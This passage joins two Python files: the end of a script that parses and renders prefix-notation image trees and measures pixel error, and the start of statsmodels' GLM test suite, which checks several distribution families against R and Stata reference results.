        '* Generating Time: %.2f s\n' % delta_time,
        '* Average attempt time: %f s\n' % (delta_time / attempts),
        '* Average new tree time: %f s\n' % (delta_time / num_generated_trees),
    ]
    append_stats(gen_opts, ''.join(pieces))
def append_stats(gen_opts, stats):
    """Append text to the on-disk stats file and to the in-memory copy."""
    stats_path = gen_opts['paths']['stats']
    with open(stats_path, 'a') as out:
        out.write(stats)
    gen_opts['stats'] += stats
def save_hand_crafted_examples(img_size, dir_path='imgs/handmade/'):
    """Render the hand-written example codes to numbered PNGs in dir_path."""
    ensure_dir(dir_path)
    filename_pat = dir_path + '%03d.png'
    for index, code in enumerate(make_hand_crafted_examples(), start=1):
        render_to_file(filename_pat % index, img_size, code)
def append_line(filename, line):
    """Append *line* plus a trailing newline to *filename*."""
    with open(filename, 'a') as out:
        out.write("%s\n" % line)
def ensure_dir(file_path):
    """Create the parent directory of *file_path* if it does not exist.

    Parameters
    ----------
    file_path : str
        Path to a file; only its directory component is created.

    Returns
    -------
    str
        The unchanged *file_path*, so the call can be chained.
    """
    directory = os.path.dirname(file_path)
    # A bare filename has no directory component — the old code called
    # os.makedirs('') in that case and raised FileNotFoundError.
    # exist_ok=True also removes the check-then-create race of the
    # previous os.path.exists() guard.
    if directory:
        os.makedirs(directory, exist_ok=True)
    return file_path
def does_dir_exist(file_path):
    """Return True when the directory containing *file_path* exists."""
    parent = os.path.dirname(file_path)
    return os.path.exists(parent)
def does_file_exist(file_path):
    """Return True when *file_path* names an existing regular file."""
    return os.path.isfile(file_path)
def root_symbol(code):
    """Return the operator symbol at the root of a nested s-expression.

    A leaf is its own root; for a list the root is the first element of
    the outermost (and any directly nested head) list.
    """
    while isinstance(code, list):
        code = code[0]
    return code
def to_prefix_notation(code):
    """Serialize a nested s-expression to a whitespace-separated prefix string."""
    return ' '.join(to_prefix_json(code))
def to_prefix_json(code):
    """Flatten a nested s-expression into a pre-order list of its symbols."""
    if not isinstance(code, list):
        return [code]
    flattened = []
    for arg in code:
        flattened.extend(to_prefix_json(arg))
    return flattened
def from_prefix_notation(prefix_notation_str, arity_dict, default_sym):
    """Parse a prefix-notation string into a tree, repairing malformed input.

    Surplus symbols are dropped and missing ones are filled with
    *default_sym*.  Returns ``(tree, mismatch)`` where *mismatch* is the
    symbol-count error of the raw input (0 when already well formed).
    """
    prefix_list = prefix_notation_str.strip().split()
    mismatch = compute_prefix_mismatch(prefix_list, arity_dict)
    if mismatch < 0:
        del prefix_list[mismatch:]  # Too many symbols, we cut off last -mismatch elements.
    elif mismatch > 0:
        prefix_list += [default_sym] * mismatch  # Too few symbols, we add default symbols.
    return from_prefix_list(prefix_list, arity_dict), mismatch
def from_prefix_list(prefix_list, arity_dict):
    """Rebuild the nested s-expression encoded by a well-formed prefix list.

    Walks the symbols right-to-left, keeping completed subtrees on a
    stack; an operator of arity k pops its k (already built) children in
    left-to-right order.
    """
    stack = []
    for sym in reversed(prefix_list):
        arity = arity_dict[sym]
        if arity == 0:
            stack.append(sym)
            continue
        node = [sym]
        for _ in range(arity):
            node.append(stack.pop())
        stack.append(node)
    return stack.pop()
def compute_prefix_mismatch(prefix_list, arity_dict):
    """Return the symbol-count error of a prefix list.

    0 means the list encodes exactly one complete tree; a positive value
    is the number of missing symbols; a negative value is minus the
    number of surplus symbols.  Raises ValueError on unknown symbols.
    """
    open_slots = 1  # the root is the one initially open slot
    for sym in prefix_list:
        if sym not in arity_dict:
            raise ValueError("Unsupported symbol '%s' in '%s'." % (sym, prefix_list))
        # each symbol fills one slot and opens `arity` new ones
        open_slots += arity_dict[sym] - 1
    return open_slots
def from_prefix_notation_family_1(prefix_notation_str):
    # Convenience wrapper for the "family 1" grammar; arity_dict_family_1
    # and W (used as the fill symbol for truncated input) are module-level
    # globals defined elsewhere in this file.
    return from_prefix_notation(prefix_notation_str, arity_dict_family_1, W)
def test_img_code(img_code):
    """Round-trip *img_code* through prefix notation and verify it survives."""
    prefix_code = to_prefix_notation(img_code)
    decoded, mismatch = from_prefix_notation_family_1(prefix_code)
    # The decoded tree must be structurally identical and need no repair.
    if mismatch != 0 or str(decoded) != str(img_code):
        raise ValueError('TEST FAILED!')
    print('OK: %s' % decoded)
def main_test_sort():
    """Demo: print (name, score) pairs sorted by score, highest first."""
    rows = [('abc', 12.1), ('cde', 120.1), ('efg', 1.21)]
    for entry in sorted(rows, key=lambda r: r[1], reverse=True):
        print(entry)
def main_test():
    """Manual smoke test: exercise the prefix-notation parser (including
    repair of truncated input), round-trip all hand-crafted examples, and
    visually compare two elephant renderings."""
    # Parser demo: the last two strings are intentionally incomplete /
    # over-complete to exercise the repair logic.
    print(from_prefix_notation_family_1("W"))
    print(from_prefix_notation_family_1("B"))
    print(from_prefix_notation_family_1("h"))
    print(from_prefix_notation_family_1("h v B h B"))
    print(from_prefix_notation_family_1("h v B h B W W W B B B"))
    examples = make_hand_crafted_examples()
    for code in examples:
        test_img_code(code)
    img_size = (256, 256)
    # Examples 2 and 3 are assumed to be the elephant and its simplified
    # variant — TODO confirm against make_hand_crafted_examples().
    elephant = examples[2]
    simpler_elephant = examples[3]
    im1 = render_to_img(img_size, elephant)
    im2 = render_to_img(img_size, simpler_elephant)
    i1 = np.array(im1).astype(float)
    i2 = np.array(im2).astype(float)
    diff = np.abs(i1 - i2)
    # Normalized mean absolute error over 3 channels in [0, 255].
    err = np.sum(diff) / (3 * img_size[0] * img_size[1] * 255)
    print(float(err))
    # Opens external image viewers — interactive inspection only.
    im1.show()
    im2.show()
    diff = ImageMath.eval("abs(a - b)", a=im1.convert('L'), b=im2.convert('L'))
    diff.show()
def robust_err(input_img_path, output_prefix_notation_str):
    """Error between a reference image on disk and the rendering of a
    (possibly malformed, auto-repaired) prefix-notation code."""
    reference = Image.open(input_img_path)
    corrected_code, mismatch = from_prefix_notation_family_1(output_prefix_notation_str)
    rendered = render_to_img(reference.size, corrected_code)
    return imgs_err(reference, rendered)
def codes_err(code1, code2, img_size):
    """Render both codes at *img_size* and return their normalized pixel error."""
    rendered_a = render_to_img(img_size, code1)
    rendered_b = render_to_img(img_size, code2)
    return imgs_err(rendered_a, rendered_b)
def imgs_err(im1, im2):
    """Normalized mean absolute pixel error between two same-size images.

    Returns a float in [0, 1]: 0 for identical images, 1 when every pixel
    differs by the full 255 in all 3 channels.  Raises ValueError when
    the image sizes differ.
    """
    if im1.size != im2.size:
        raise ValueError("Images must have the same size.")
    a = np.array(im1).astype(float)
    b = np.array(im2).astype(float)
    total_abs_diff = np.sum(np.abs(a - b))
    # Normalize by 3 channels * width * height * max channel value.
    return float(total_abs_diff / (3 * im1.size[0] * im1.size[1] * 255))
if __name__ == '__main__':
    # Entry-point selector: exactly one of the driver functions below is
    # uncommented at a time; the rest are kept for quick manual switching.
    # main()
    # main_nn()
    # main_test_nn()
    # main_test()
    # main_process_results()
    # test_histogram()
    main_prepare_experiment()
    # test_big_image()
# ==== file boundary: statsmodels/genmod/tests/test_glm.py ====
"""
Test functions for models.GLM
"""
import warnings
import os
import numpy as np
from numpy.testing import (assert_almost_equal, assert_equal, assert_raises,
assert_allclose, assert_, assert_array_less)
import pandas as pd
from pandas.testing import assert_series_equal
import pytest
from scipy import stats
import statsmodels.api as sm
from statsmodels.genmod.generalized_linear_model import GLM
from statsmodels.tools.tools import add_constant
from statsmodels.tools.sm_exceptions import PerfectSeparationError
from statsmodels.discrete import discrete_model as discrete
from statsmodels.tools.sm_exceptions import DomainWarning
from statsmodels.tools.numdiff import approx_fprime, approx_hess
from statsmodels.datasets import cpunish
# Test Precisions
# Number of decimal places used by assert_almost_equal in the checks below;
# individual test classes loosen these per quantity.
DECIMAL_4 = 4
DECIMAL_3 = 3
DECIMAL_2 = 2
DECIMAL_1 = 1
DECIMAL_0 = 0
# Flip to True to dump diagnostic plots into test_glm.pdf (requires matplotlib).
pdf_output = False
if pdf_output:
    from matplotlib.backends.backend_pdf import PdfPages
    pdf = PdfPages("test_glm.pdf")
else:
    pdf = None
def close_or_save(pdf, fig):
    """Save *fig* into the shared diagnostic PDF when output is enabled;
    otherwise do nothing (the close_figures fixture handles cleanup)."""
    if not pdf_output:
        return
    pdf.savefig(fig)
def teardown_module():
    """pytest hook: flush and close the shared diagnostic PDF, if open."""
    if not pdf_output:
        return
    pdf.close()
class CheckModelResultsMixin(object):
    '''
    res2 should be either the results from RModelWrap
    or the results as defined in model_results_data

    Subclasses set ``res1`` (a fitted GLM results instance) and ``res2``
    (reference results) in ``setup_class``; the ``decimal_*`` class
    attributes control the comparison precision of each check.
    '''
    decimal_params = DECIMAL_4
    def test_params(self):
        assert_almost_equal(self.res1.params, self.res2.params,
                            self.decimal_params)
    decimal_bse = DECIMAL_4
    def test_standard_errors(self):
        assert_allclose(self.res1.bse, self.res2.bse,
                        atol=10**(-self.decimal_bse), rtol=1e-5)
    decimal_resids = DECIMAL_4
    def test_residuals(self):
        # fix incorrect numbers in resid_working results
        # residuals for Poisson are also tested in test_glm_weights.py
        import copy
        # new numpy would have copy method
        resid2 = copy.copy(self.res2.resids)
        # rescale reference working residuals by the squared link derivative
        resid2[:, 2] *= self.res1.family.link.deriv(self.res1.mu)**2
        atol = 10**(-self.decimal_resids)
        with warnings.catch_warnings():
            # resid_anscombe emits a FutureWarning in this version
            warnings.simplefilter("ignore", category=FutureWarning)
            resid_a = self.res1.resid_anscombe
        # columns: pearson, deviance, working, anscombe, response — same
        # order as the reference resids array
        resids = np.column_stack((self.res1.resid_pearson,
                self.res1.resid_deviance, self.res1.resid_working,
                resid_a, self.res1.resid_response))
        assert_allclose(resids, resid2, rtol=1e-6, atol=atol)
    decimal_aic_R = DECIMAL_4
    def test_aic_R(self):
        # R includes the estimation of the scale as a lost dof
        # Does not with Gamma though
        if self.res1.scale != 1:
            dof = 2
        else:
            dof = 0
        if isinstance(self.res1.model.family, (sm.families.NegativeBinomial)):
            # NegativeBinomial: recompute llf at scale=1 for comparability
            llf = self.res1.model.family.loglike(self.res1.model.endog,
                                                 self.res1.mu,
                                                 self.res1.model.var_weights,
                                                 self.res1.model.freq_weights,
                                                 scale=1)
            aic = (-2*llf+2*(self.res1.df_model+1))
        else:
            aic = self.res1.aic
        assert_almost_equal(aic+dof, self.res2.aic_R,
                            self.decimal_aic_R)
    decimal_aic_Stata = DECIMAL_4
    def test_aic_Stata(self):
        # Stata uses the below llf for aic definition for these families
        if isinstance(self.res1.model.family, (sm.families.Gamma,
                                               sm.families.InverseGaussian,
                                               sm.families.NegativeBinomial)):
            llf = self.res1.model.family.loglike(self.res1.model.endog,
                                                 self.res1.mu,
                                                 self.res1.model.var_weights,
                                                 self.res1.model.freq_weights,
                                                 scale=1)
            aic = (-2*llf+2*(self.res1.df_model+1))/self.res1.nobs
        else:
            aic = self.res1.aic/self.res1.nobs
        assert_almost_equal(aic, self.res2.aic_Stata, self.decimal_aic_Stata)
    decimal_deviance = DECIMAL_4
    def test_deviance(self):
        assert_almost_equal(self.res1.deviance, self.res2.deviance,
                            self.decimal_deviance)
    decimal_scale = DECIMAL_4
    def test_scale(self):
        assert_almost_equal(self.res1.scale, self.res2.scale,
                            self.decimal_scale)
    decimal_loglike = DECIMAL_4
    def test_loglike(self):
        # Stata uses the below llf for these families
        # We differ with R for them
        if isinstance(self.res1.model.family, (sm.families.Gamma,
                                               sm.families.InverseGaussian,
                                               sm.families.NegativeBinomial)):
            llf = self.res1.model.family.loglike(self.res1.model.endog,
                                                 self.res1.mu,
                                                 self.res1.model.var_weights,
                                                 self.res1.model.freq_weights,
                                                 scale=1)
        else:
            llf = self.res1.llf
        assert_almost_equal(llf, self.res2.llf, self.decimal_loglike)
    decimal_null_deviance = DECIMAL_4
    def test_null_deviance(self):
        assert_almost_equal(self.res1.null_deviance, self.res2.null_deviance,
                            self.decimal_null_deviance)
    decimal_bic = DECIMAL_4
    def test_bic(self):
        # compared against Stata's BIC definition
        assert_almost_equal(self.res1.bic, self.res2.bic_Stata,
                            self.decimal_bic)
    def test_degrees(self):
        assert_equal(self.res1.model.df_resid,self.res2.df_resid)
    decimal_fittedvalues = DECIMAL_4
    def test_fittedvalues(self):
        assert_almost_equal(self.res1.fittedvalues, self.res2.fittedvalues,
                            self.decimal_fittedvalues)
    def test_tpvalues(self):
        # test comparing tvalues and pvalues with normal implementation
        # make sure they use normal distribution (inherited in results class)
        params = self.res1.params
        tvalues = params / self.res1.bse
        pvalues = stats.norm.sf(np.abs(tvalues)) * 2
        half_width = stats.norm.isf(0.025) * self.res1.bse
        conf_int = np.column_stack((params - half_width, params + half_width))
        if isinstance(tvalues, pd.Series):
            assert_series_equal(self.res1.tvalues, tvalues)
        else:
            assert_almost_equal(self.res1.tvalues, tvalues)
        assert_almost_equal(self.res1.pvalues, pvalues)
        assert_almost_equal(self.res1.conf_int(), conf_int)
    def test_pearson_chi2(self):
        # only checked when the reference results provide the statistic
        if hasattr(self.res2, 'pearson_chi2'):
            assert_allclose(self.res1.pearson_chi2, self.res2.pearson_chi2,
                            atol=1e-6, rtol=1e-6)
    @pytest.mark.smoke
    def test_summary(self):
        self.res1.summary()
    @pytest.mark.smoke
    def test_summary2(self):
        self.res1.summary2()
class CheckComparisonMixin(object):
    # Cross-checks a GLM results instance (res1) against the equivalent
    # discrete model (resd, e.g. Logit/Poisson): llf, score, hessian and
    # the score test must agree.
    def test_compare_discrete(self):
        res1 = self.res1
        resd = self.resd
        assert_allclose(res1.llf, resd.llf, rtol=1e-10)
        # evaluate away from the optimum (params * 0.98) so score != 0
        score_obs1 = res1.model.score_obs(res1.params * 0.98)
        score_obsd = resd.model.score_obs(resd.params * 0.98)
        assert_allclose(score_obs1, score_obsd, rtol=1e-10)
        # score
        score1 = res1.model.score(res1.params * 0.98)
        assert_allclose(score1, score_obs1.sum(0), atol=1e-20)
        # at the optimum the score must vanish
        score0 = res1.model.score(res1.params)
        assert_allclose(score0, np.zeros(score_obs1.shape[1]), atol=5e-7)
        hessian1 = res1.model.hessian(res1.params * 0.98, observed=False)
        hessiand = resd.model.hessian(resd.params * 0.98)
        assert_allclose(hessian1, hessiand, rtol=1e-10)
        hessian1 = res1.model.hessian(res1.params * 0.98, observed=True)
        hessiand = resd.model.hessian(resd.params * 0.98)
        assert_allclose(hessian1, hessiand, rtol=1e-9)
    def test_score_test(self):
        res1 = self.res1
        # fake example, should be zero, k_constraint should be 0
        st, pv, df = res1.model.score_test(res1.params, k_constraints=1)
        assert_allclose(st, 0, atol=1e-20)
        assert_allclose(pv, 1, atol=1e-10)
        assert_equal(df, 1)
        st, pv, df = res1.model.score_test(res1.params, k_constraints=0)
        assert_allclose(st, 0, atol=1e-20)
        # zero constraints -> p-value is undefined (NaN)
        assert_(np.isnan(pv), msg=repr(pv))
        assert_equal(df, 0)
        # TODO: no verified numbers largely SMOKE test
        exog_extra = res1.model.exog[:,1]**2
        st, pv, df = res1.model.score_test(res1.params, exog_extra=exog_extra)
        assert_array_less(0.1, st)
        assert_array_less(0.1, pv)
        assert_equal(df, 1)
class TestGlmGaussian(CheckModelResultsMixin):
    @classmethod
    def setup_class(cls):
        '''
        Test Gaussian family with canonical identity link
        '''
        # Test Precisions
        cls.decimal_resids = DECIMAL_3
        cls.decimal_params = DECIMAL_2
        cls.decimal_bic = DECIMAL_0
        cls.decimal_bse = DECIMAL_3
        from statsmodels.datasets.longley import load
        cls.data = load(as_pandas=False)
        cls.data.exog = add_constant(cls.data.exog, prepend=False)
        cls.res1 = GLM(cls.data.endog, cls.data.exog,
                       family=sm.families.Gaussian()).fit()
        from .results.results_glm import Longley
        cls.res2 = Longley()
    def test_compare_OLS(self):
        # Gaussian GLM with identity link must reproduce OLS exactly
        res1 = self.res1
        # OLS does not define score_obs
        from statsmodels.regression.linear_model import OLS
        resd = OLS(self.data.endog, self.data.exog).fit()
        self.resd = resd  # attach to access from the outside
        assert_allclose(res1.llf, resd.llf, rtol=1e-10)
        score_obs1 = res1.model.score_obs(res1.params, scale=None)
        score_obsd = resd.resid[:, None] / resd.scale * resd.model.exog
        # low precision because of badly scaled exog
        assert_allclose(score_obs1, score_obsd, rtol=1e-8)
        score_obs1 = res1.model.score_obs(res1.params, scale=1)
        score_obsd = resd.resid[:, None] * resd.model.exog
        assert_allclose(score_obs1, score_obsd, rtol=1e-8)
        hess_obs1 = res1.model.hessian(res1.params, scale=None)
        hess_obsd = -1. / resd.scale * resd.model.exog.T.dot(resd.model.exog)
        # low precision because of badly scaled exog
        assert_allclose(hess_obs1, hess_obsd, rtol=1e-8)
    # FIXME: enable or delete
    # def setup(self):
    #     if skipR:
    #         raise SkipTest, "Rpy not installed."
    #     Gauss = r.gaussian
    #     self.res2 = RModel(self.data.endog, self.data.exog, r.glm, family=Gauss)
    #     self.res2.resids = np.array(self.res2.resid)[:,None]*np.ones((1,5))
    #     self.res2.null_deviance = 185008826 # taken from R. Rpy bug?
class TestGlmGaussianGradient(TestGlmGaussian):
    # Same as TestGlmGaussian but fit by gradient optimization (bfgs)
    # instead of IRLS; bse precision is relaxed accordingly.
    @classmethod
    def setup_class(cls):
        '''
        Test Gaussian family with canonical identity link
        '''
        # Test Precisions
        cls.decimal_resids = DECIMAL_3
        cls.decimal_params = DECIMAL_2
        cls.decimal_bic = DECIMAL_0
        cls.decimal_bse = DECIMAL_2
        from statsmodels.datasets.longley import load
        cls.data = load(as_pandas=False)
        cls.data.exog = add_constant(cls.data.exog, prepend=False)
        cls.res1 = GLM(cls.data.endog, cls.data.exog,
                       family=sm.families.Gaussian()).fit(method='bfgs')
        from .results.results_glm import Longley
        cls.res2 = Longley()
class TestGaussianLog(CheckModelResultsMixin):
    # Gaussian family with (non-canonical) log link on simulated data.
    @classmethod
    def setup_class(cls):
        # Test Precision
        cls.decimal_aic_R = DECIMAL_0
        cls.decimal_aic_Stata = DECIMAL_2
        cls.decimal_loglike = DECIMAL_0
        cls.decimal_null_deviance = DECIMAL_1
        nobs = 100
        x = np.arange(nobs)
        np.random.seed(54321)
        # y = 1.0 - .02*x - .001*x**2 + 0.001 * np.random.randn(nobs)
        cls.X = np.c_[np.ones((nobs,1)),x,x**2]
        cls.lny = np.exp(-(-1.0 + 0.02*x + 0.0001*x**2)) +\
                        0.001 * np.random.randn(nobs)
        GaussLog_Model = GLM(cls.lny, cls.X,
                             family=sm.families.Gaussian(sm.families.links.log()))
        cls.res1 = GaussLog_Model.fit()
        from .results.results_glm import GaussianLog
        cls.res2 = GaussianLog()
    # FIXME: enable or delete
    # def setup(cls):
    #     if skipR:
    #         raise SkipTest, "Rpy not installed"
    #     GaussLogLink = r.gaussian(link = "log")
    #     GaussLog_Res_R = RModel(cls.lny, cls.X, r.glm, family=GaussLogLink)
    #     cls.res2 = GaussLog_Res_R
class TestGaussianInverse(CheckModelResultsMixin):
    # Gaussian family with inverse-power link on simulated data.
    @classmethod
    def setup_class(cls):
        # Test Precisions
        cls.decimal_bic = DECIMAL_1
        cls.decimal_aic_R = DECIMAL_1
        cls.decimal_aic_Stata = DECIMAL_3
        cls.decimal_loglike = DECIMAL_1
        cls.decimal_resids = DECIMAL_3
        nobs = 100
        x = np.arange(nobs)
        np.random.seed(54321)
        # NOTE: y itself is unused, but this line consumes nobs draws from
        # the seeded RNG stream; removing it would change y_inv and break
        # the comparison against the stored reference results.
        y = 1.0 + 2.0 * x + x**2 + 0.1 * np.random.randn(nobs)
        cls.X = np.c_[np.ones((nobs,1)),x,x**2]
        cls.y_inv = (1. + .02*x + .001*x**2)**-1 + .001 * np.random.randn(nobs)
        InverseLink_Model = GLM(cls.y_inv, cls.X,
                                family=sm.families.Gaussian(sm.families.links.inverse_power()))
        InverseLink_Res = InverseLink_Model.fit()
        cls.res1 = InverseLink_Res
        from .results.results_glm import GaussianInverse
        cls.res2 = GaussianInverse()
    # FIXME: enable or delete
    # def setup(cls):
    #     if skipR:
    #         raise SkipTest, "Rpy not installed."
    #     InverseLink = r.gaussian(link = "inverse")
    #     InverseLink_Res_R = RModel(cls.y_inv, cls.X, r.glm, family=InverseLink)
    #     cls.res2 = InverseLink_Res_R
class TestGlmBinomial(CheckModelResultsMixin):
    @classmethod
    def setup_class(cls):
        '''
        Test Binomial family with canonical logit link using star98 dataset.
        '''
        cls.decimal_resids = DECIMAL_1
        cls.decimal_bic = DECIMAL_2
        from statsmodels.datasets.star98 import load
        from .results.results_glm import Star98
        data = load(as_pandas=False)
        data.exog = add_constant(data.exog, prepend=False)
        cls.res1 = GLM(data.endog, data.exog,
                       family=sm.families.Binomial()).fit()
        # NOTE: if you want to replicate with RModel
        # res2 = RModel(data.endog[:,0]/trials, data.exog, r.glm,
        #        family=r.binomial, weights=trials)
        cls.res2 = Star98()

    def test_endog_dtype(self):
        # Fitting must be invariant to the endog dtype (int vs float).
        from statsmodels.datasets.star98 import load
        data = load(as_pandas=False)
        data.exog = add_constant(data.exog, prepend=False)
        # ``np.int`` was a deprecated alias of the builtin ``int`` and was
        # removed in NumPy 1.24; the builtin is exactly equivalent.
        endog = data.endog.astype(int)
        res2 = GLM(endog, data.exog, family=sm.families.Binomial()).fit()
        assert_allclose(res2.params, self.res1.params)
        endog = data.endog.astype(np.double)
        res3 = GLM(endog, data.exog, family=sm.families.Binomial()).fit()
        assert_allclose(res3.params, self.res1.params)

    def test_invalid_endog(self, reset_randomstate):
        # GH2733 inspired check: Binomial endog with >2 columns must raise
        endog = np.random.randint(0, 100, size=(1000, 3))
        exog = np.random.standard_normal((1000, 2))
        with pytest.raises(ValueError, match='endog has more than 2 columns'):
            GLM(endog, exog, family=sm.families.Binomial())

    def test_invalid_endog_formula(self, reset_randomstate):
        # GH2733: string endog via formula expands to >2 columns and must raise
        n = 200
        exog = np.random.normal(size=(n, 2))
        endog = np.random.randint(0, 3, size=n).astype(str)
        # formula interface
        data = pd.DataFrame({"y": endog, "x1": exog[:, 0], "x2": exog[:, 1]})
        with pytest.raises(ValueError, match='array with multiple columns'):
            sm.GLM.from_formula("y ~ x1 + x2", data,
                                family=sm.families.Binomial())
# FIXME: enable/xfail/skip or delete
# TODO:
# Non-Canonical Links for the Binomial family require the algorithm to be
# slightly changed
# class TestGlmBinomialLog(CheckModelResultsMixin):
# pass
# class TestGlmBinomialLogit(CheckModelResultsMixin):
# pass
# class TestGlmBinomialProbit(CheckModelResultsMixin):
# pass
# class TestGlmBinomialCloglog(CheckModelResultsMixin):
# pass
# class TestGlmBinomialPower(CheckModelResultsMixin):
# pass
# class TestGlmBinomialLoglog(CheckModelResultsMixin):
# pass
# class TestGlmBinomialLogc(CheckModelResultsMixin):
# TODO: need include logc link
# pass
class TestGlmBernoulli(CheckModelResultsMixin, CheckComparisonMixin):
    # Binomial family on 0/1 data (low birth weight dataset), cross-checked
    # against discrete.Logit via CheckComparisonMixin.
    @classmethod
    def setup_class(cls):
        from .results.results_glm import Lbw
        cls.res2 = Lbw()
        cls.res1 = GLM(cls.res2.endog, cls.res2.exog,
                       family=sm.families.Binomial()).fit()
        modd = discrete.Logit(cls.res2.endog, cls.res2.exog)
        cls.resd = modd.fit(start_params=cls.res1.params * 0.9, disp=False)
    def test_score_r(self):
        # score-test statistics verified against R's anova(..., test="Rao")
        # and statmod::glm.scoretest (see cmd_r below)
        res1 = self.res1
        res2 = self.res2
        st, pv, df = res1.model.score_test(res1.params,
                                           exog_extra=res1.model.exog[:, 1]**2)
        st_res = 0.2837680293459376  # (-0.5326988167303712)**2
        assert_allclose(st, st_res, rtol=1e-4)
        st, pv, df = res1.model.score_test(res1.params,
                                           exog_extra=res1.model.exog[:, 0]**2)
        st_res = 0.6713492821514992  # (-0.8193590679009413)**2
        assert_allclose(st, st_res, rtol=1e-4)
        # refit without column 7 and score-test for adding it back
        select = list(range(9))
        select.pop(7)
        res1b = GLM(res2.endog, res2.exog.iloc[:, select],
                    family=sm.families.Binomial()).fit()
        tres = res1b.model.score_test(res1b.params,
                                      exog_extra=res1.model.exog[:, -2])
        tres = np.asarray(tres[:2]).ravel()
        tres_r = (2.7864148487452, 0.0950667)
        assert_allclose(tres, tres_r, rtol=1e-4)
    # R commands used to produce the reference numbers above (not executed)
    cmd_r = """\
data = read.csv("...statsmodels\\statsmodels\\genmod\\tests\\results\\stata_lbw_glm.csv")
data["race_black"] = data["race"] == "black"
data["race_other"] = data["race"] == "other"
mod = glm(low ~ age + lwt + race_black + race_other + smoke + ptl + ht + ui, family=binomial, data=data)
options(digits=16)
anova(mod, test="Rao")
library(statmod)
s = glm.scoretest(mod, data["age"]**2)
s**2
s = glm.scoretest(mod, data["lwt"]**2)
s**2
"""
# class TestGlmBernoulliIdentity(CheckModelResultsMixin):
# pass
# class TestGlmBernoulliLog(CheckModelResultsMixin):
# pass
# class TestGlmBernoulliProbit(CheckModelResultsMixin):
# pass
# class TestGlmBernoulliCloglog(CheckModelResultsMixin):
# pass
# class TestGlmBernoulliPower(CheckModelResultsMixin):
# pass
# class TestGlmBernoulliLoglog(CheckModelResultsMixin):
# pass
# class test_glm_bernoulli_logc(CheckModelResultsMixin):
# pass
class TestGlmGamma(CheckModelResultsMixin):
    @classmethod
    def setup_class(cls):
        '''
        Tests Gamma family with canonical inverse link (power -1)
        '''
        # Test Precisions
        cls.decimal_aic_R = -1 #TODO: off by about 1, we are right with Stata
        cls.decimal_resids = DECIMAL_2
        from statsmodels.datasets.scotland import load
        from .results.results_glm import Scotvote
        data = load(as_pandas=False)
        data.exog = add_constant(data.exog, prepend=False)
        with warnings.catch_warnings():
            warnings.simplefilter("ignore")
            res1 = GLM(data.endog, data.exog,
                       family=sm.families.Gamma()).fit()
        cls.res1 = res1
        # res2 = RModel(data.endog, data.exog, r.glm, family=r.Gamma)
        res2 = Scotvote()
        res2.aic_R += 2  # R does not count degree of freedom for scale with gamma
        cls.res2 = res2
class TestGlmGammaLog(CheckModelResultsMixin):
    # Gamma family with (non-canonical) log link on the CancerLog data.
    @classmethod
    def setup_class(cls):
        # Test Precisions
        cls.decimal_resids = DECIMAL_3
        cls.decimal_aic_R = DECIMAL_0
        cls.decimal_fittedvalues = DECIMAL_3
        from .results.results_glm import CancerLog
        res2 = CancerLog()
        cls.res1 = GLM(res2.endog, res2.exog,
                       family=sm.families.Gamma(link=sm.families.links.log())).fit()
        cls.res2 = res2
    # FIXME: enable or delete
    # def setup(cls):
    #     if skipR:
    #         raise SkipTest, "Rpy not installed."
    #     cls.res2 = RModel(cls.data.endog, cls.data.exog, r.glm,
    #         family=r.Gamma(link="log"))
    #     cls.res2.null_deviance = 27.92207137420696 # From R (bug in rpy)
    #     cls.res2.bic = -154.1582089453923 # from Stata
class TestGlmGammaIdentity(CheckModelResultsMixin):
    # Gamma family with identity link on the CancerIdentity data.
    @classmethod
    def setup_class(cls):
        # Test Precisions
        cls.decimal_resids = -100 #TODO Very off from Stata?
        cls.decimal_params = DECIMAL_2
        cls.decimal_aic_R = DECIMAL_0
        cls.decimal_loglike = DECIMAL_1
        from .results.results_glm import CancerIdentity
        res2 = CancerIdentity()
        with warnings.catch_warnings():
            # identity link for Gamma emits a DomainWarning
            warnings.simplefilter("ignore")
            fam = sm.families.Gamma(link=sm.families.links.identity())
            cls.res1 = GLM(res2.endog, res2.exog, family=fam).fit()
        cls.res2 = res2
    # FIXME: enable or delete
    # def setup(cls):
    #     if skipR:
    #         raise SkipTest, "Rpy not installed."
    #     cls.res2 = RModel(cls.data.endog, cls.data.exog, r.glm,
    #         family=r.Gamma(link="identity"))
    #     cls.res2.null_deviance = 27.92207137420696 # from R, Rpy bug
class TestGlmPoisson(CheckModelResultsMixin, CheckComparisonMixin):
    @classmethod
    def setup_class(cls):
        '''
        Tests Poisson family with canonical log link.
        Test results were obtained by R.
        '''
        from .results.results_glm import Cpunish
        cls.data = cpunish.load(as_pandas=False)
        # log-transform the income column as in the reference model
        cls.data.exog[:, 3] = np.log(cls.data.exog[:, 3])
        cls.data.exog = add_constant(cls.data.exog, prepend=False)
        cls.res1 = GLM(cls.data.endog, cls.data.exog,
                       family=sm.families.Poisson()).fit()
        cls.res2 = Cpunish()
        # compare with discrete, start close to save time
        modd = discrete.Poisson(cls.data.endog, cls.data.exog)
        cls.resd = modd.fit(start_params=cls.res1.params * 0.9, disp=False)
#class TestGlmPoissonIdentity(CheckModelResultsMixin):
# pass
#class TestGlmPoissonPower(CheckModelResultsMixin):
# pass
class TestGlmInvgauss(CheckModelResultsMixin):
    @classmethod
    def setup_class(cls):
        '''
        Tests the Inverse Gaussian family in GLM.
        Notes
        -----
        Used the rndivgx.ado file provided by Hardin and Hilbe to
        generate the data. Results are read from model_results, which
        were obtained by running R_ig.s
        '''
        # Test Precisions
        cls.decimal_aic_R = DECIMAL_0
        cls.decimal_loglike = DECIMAL_0
        from .results.results_glm import InvGauss
        res2 = InvGauss()
        res1 = GLM(res2.endog, res2.exog, \
                   family=sm.families.InverseGaussian()).fit()
        cls.res1 = res1
        cls.res2 = res2
class TestGlmInvgaussLog(CheckModelResultsMixin):
    # Inverse Gaussian family with (non-canonical) log link.
    @classmethod
    def setup_class(cls):
        # Test Precisions
        cls.decimal_aic_R = -10  # Big difference vs R.
        cls.decimal_resids = DECIMAL_3
        from .results.results_glm import InvGaussLog
        res2 = InvGaussLog()
        cls.res1 = GLM(res2.endog, res2.exog,
                       family=sm.families.InverseGaussian(
                           link=sm.families.links.log())).fit()
        cls.res2 = res2
    # FIXME: enable or delete
    # def setup(cls):
    #     if skipR:
    #         raise SkipTest, "Rpy not installed."
    #     cls.res2 = RModel(cls.data.endog, cls.data.exog, r.glm,
    #         family=r.inverse_gaussian(link="log"))
    #     cls.res2.null_deviance = 335.1539777981053 # from R, Rpy bug
    #     cls.res2.llf = -12162.72308 # from Stata, R's has big rounding diff
class TestGlmInvgaussIdentity(CheckModelResultsMixin):
    # Inverse Gaussian family with identity link on the Medpar1 data.
